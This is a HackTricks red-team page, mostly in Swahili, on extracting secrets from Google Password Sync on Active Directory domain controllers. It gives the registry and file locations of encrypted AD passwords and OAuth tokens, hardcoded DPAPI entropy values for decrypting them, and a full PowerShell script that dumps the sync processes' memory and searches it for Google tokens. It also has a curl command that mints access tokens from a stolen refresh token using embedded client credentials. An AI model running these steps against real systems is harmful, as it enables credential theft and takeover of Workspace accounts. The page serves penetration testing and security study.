GPS - Google Password Sync

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Hii ni binary na huduma ambayo Google inatoa ili kuhifadhi nywila za watumiaji zikiwa sambamba kati ya AD na Workspace. Kila wakati mtumiaji anapobadilisha nywila yake katika AD, inakabidhiwa kwa Google.

Inasakinishwa katika C:\Program Files\Google\Password Sync ambapo unaweza kupata binary PasswordSync.exe ili kuikamilisha na password_sync_service.exe (huduma ambayo itaendelea kufanya kazi).

GPS - Configuration

Ili kuunda usanidi wa binary hii (na huduma), inahitajika kumpatia ufikiaji wa Super Admin principal katika Workspace:

Ingia kupitia OAuth na Google kisha itahifadhi token katika rejista (imefichwa)
Inapatikana tu katika Domain Controllers zenye GUI
Kutoa baadhi ya akidi za Akaunti ya Huduma kutoka GCP (faili ya json) zenye ruhusa za kusimamia watumiaji wa Workspace
Wazo mbaya sana kwani akidi hizo hazikuwahi kuisha na zinaweza kutumika vibaya
Wazo mbaya sana kumpatia SA ufikiaji juu ya workspace kwani SA inaweza kuathiriwa katika GCP na itakuwa rahisi kuhamasisha kwa Workspace
Google inahitaji hivyo kwa kudhibiti kikoa bila GUI
Akidi hizi pia zinahifadhiwa katika rejista

Kuhusu AD, inawezekana kuonyesha kutumia muktadha wa sasa wa programu, bila jina au akidi maalum. Ikiwa chaguo la akidi limechaguliwa, jina la mtumiaji linahifadhiwa ndani ya faili katika disk na nywila inafichwa na kuhifadhiwa katika rejista.

GPS - Dumping password and token from disk

Note that Winpeas is capable to detect GPS, get information about the configuration and even decrypt the password and token.

Katika faili C:\ProgramData\Google\Google Apps Password Sync\config.xml inawezekana kupata sehemu ya usanidi kama baseDN ya AD iliyowekwa na username ambayo akidi zake zinatumika.

Katika rejista HKLM\Software\Google\Google Apps Password Sync inawezekana kupata token ya kusasisha iliyofichwa na nywila iliyofichwa kwa mtumiaji wa AD (ikiwa ipo). Zaidi ya hayo, ikiwa badala ya token, baadhi ya akidi za SA zinatumika, pia inawezekana kupata hizo zikiwa zimefichwa katika anwani hiyo ya rejista. Thamani ndani ya rejista hii zinapatikana tu kwa Wasimamizi.

Nywila iliyofichwa (ikiwa ipo) iko ndani ya ufunguo ADPassword na imefichwa kwa kutumia CryptProtectData API. Ili kuifichua, unahitaji kuwa mtumiaji yule yule aliyekamilisha usanidi wa nywila na kutumia entropy hii unapofanya CryptUnprotectData: byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };

Token iliyofichwa (ikiwa ipo) iko ndani ya ufunguo AuthToken na imefichwa kwa kutumia CryptProtectData API. Ili kuifichua, unahitaji kuwa mtumiaji yule yule aliyekamilisha usanidi wa nywila na kutumia entropy hii unapofanya CryptUnprotectData: byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b }; Zaidi ya hayo, pia imeandikwa kwa kutumia base32hex na kamusi 0123456789abcdefghijklmnopqrstv.

Thamani za entropy zilipatikana kwa kutumia zana. Ilipangwa kufuatilia simu za CryptUnprotectData na CryptProtectData na kisha zana hiyo ilitumika kuzindua na kufuatilia PasswordSync.exe ambayo itafichua nywila iliyowekwa na token ya uthibitishaji mwanzoni na zana hiyo it onyesha thamani za entropy zilizotumika katika hali zote mbili:

Kumbuka kwamba pia inawezekana kuona thamani zilizofichuliwa katika ingizo au pato la simu hizi za API pia (ikiwa kwa bahati mbaya Winpeas itakoma kufanya kazi).

Iwapo Password Sync ilikamilishwa na akidi za SA, pia itahifadhiwa katika funguo ndani ya rejista HKLM\Software\Google\Google Apps Password Sync.

GPS - Dumping tokens from memory

Kama ilivyo na GCPW, inawezekana kutoa kumbukumbu ya mchakato wa PasswordSync.exe na mchakato wa password_sync_service.exe na utaweza kupata token za kusasisha na za ufikiaji (ikiwa tayari zimeundwa). Nadhani unaweza pia kupata akidi za AD zilizowekwa.

Dump PasswordSync.exe and the password_sync_service.exe processes and search tokens

```powershell # Define paths for Procdump and Strings utilities $procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe" $stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe" $dumpFolder = "C:\Users\Public\dumps"

Regular expressions for tokens

$tokenRegexes = @( "ya29.[a-zA-Z0-9_.-]{50,}", "1//[a-zA-Z0-9_.-]{50,}" )

Show EULA if it wasn't accepted yet for strings

$stringsPath

Create a directory for the dumps if it doesn't exist

if (!(Test-Path $dumpFolder)) { New-Item -Path $dumpFolder -ItemType Directory }

Get all Chrome process IDs

$processNames = @("PasswordSync", "password_sync_service") $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id

Dump each Chrome process

foreach ($processId in $chromeProcesses) { Write-Output "Dumping process with PID: $processId" & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" }

Extract strings and search for tokens in each dump

Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { $dumpFile = $.FullName $baseName = $.BaseName $asciiStringsFile = "$dumpFolder${baseName}_ascii_strings.txt" $unicodeStringsFile = "$dumpFolder${baseName}_unicode_strings.txt"

Write-Output "Extracting strings from $dumpFile" & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile

$outputFiles = @($asciiStringsFile, $unicodeStringsFile)

foreach ($file in $outputFiles) { foreach ($regex in $tokenRegexes) {

$matches = Select-String -Path $file -Pattern $regex -AllMatches

$uniqueMatches = @{}

foreach ($matchInfo in $matches) { foreach ($match in $matchInfo.Matches) { $matchValue = $match.Value if (-not $uniqueMatches.ContainsKey($matchValue)) { $uniqueMatches[$matchValue] = @{ LineNumber = $matchInfo.LineNumber LineText = $matchInfo.Line.Trim() FilePath = $matchInfo.Path } } } }

foreach ($matchValue in $uniqueMatches.Keys) { $info = $uniqueMatches[$matchValue] Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" } }

Write-Output "" } }

</details>

### GPS - Kutengeneza alama za ufikiaji kutoka kwa alama za upya

Kwa kutumia alama ya upya, inawezekana kutengeneza alama za ufikiaji kwa kutumia hiyo na kitambulisho cha mteja na siri ya mteja zilizoainishwa katika amri ifuatayo:
```bash
curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token

GPS - Scopes

Kumbuka kwamba hata ukiwa na token ya kusasisha, siwezi kuomba scope yoyote kwa token ya ufikiaji kwani unaweza tu kuomba scopes zinazoungwa mkono na programu ambapo unazalisha token ya ufikiaji.

Pia, token ya kusasisha si halali katika kila programu.

Kwa default GPS haitaweza kupata kama mtumiaji kwa kila scope ya OAuth inay posible, hivyo kutumia script ifuatayo tunaweza kupata scopes ambazo zinaweza kutumika na refresh_token kuzalisha access_token:

PreviousGCPW - Google Credential Provider for Windows NextGWS - Google Platforms Phishing

Last updated 3 days ago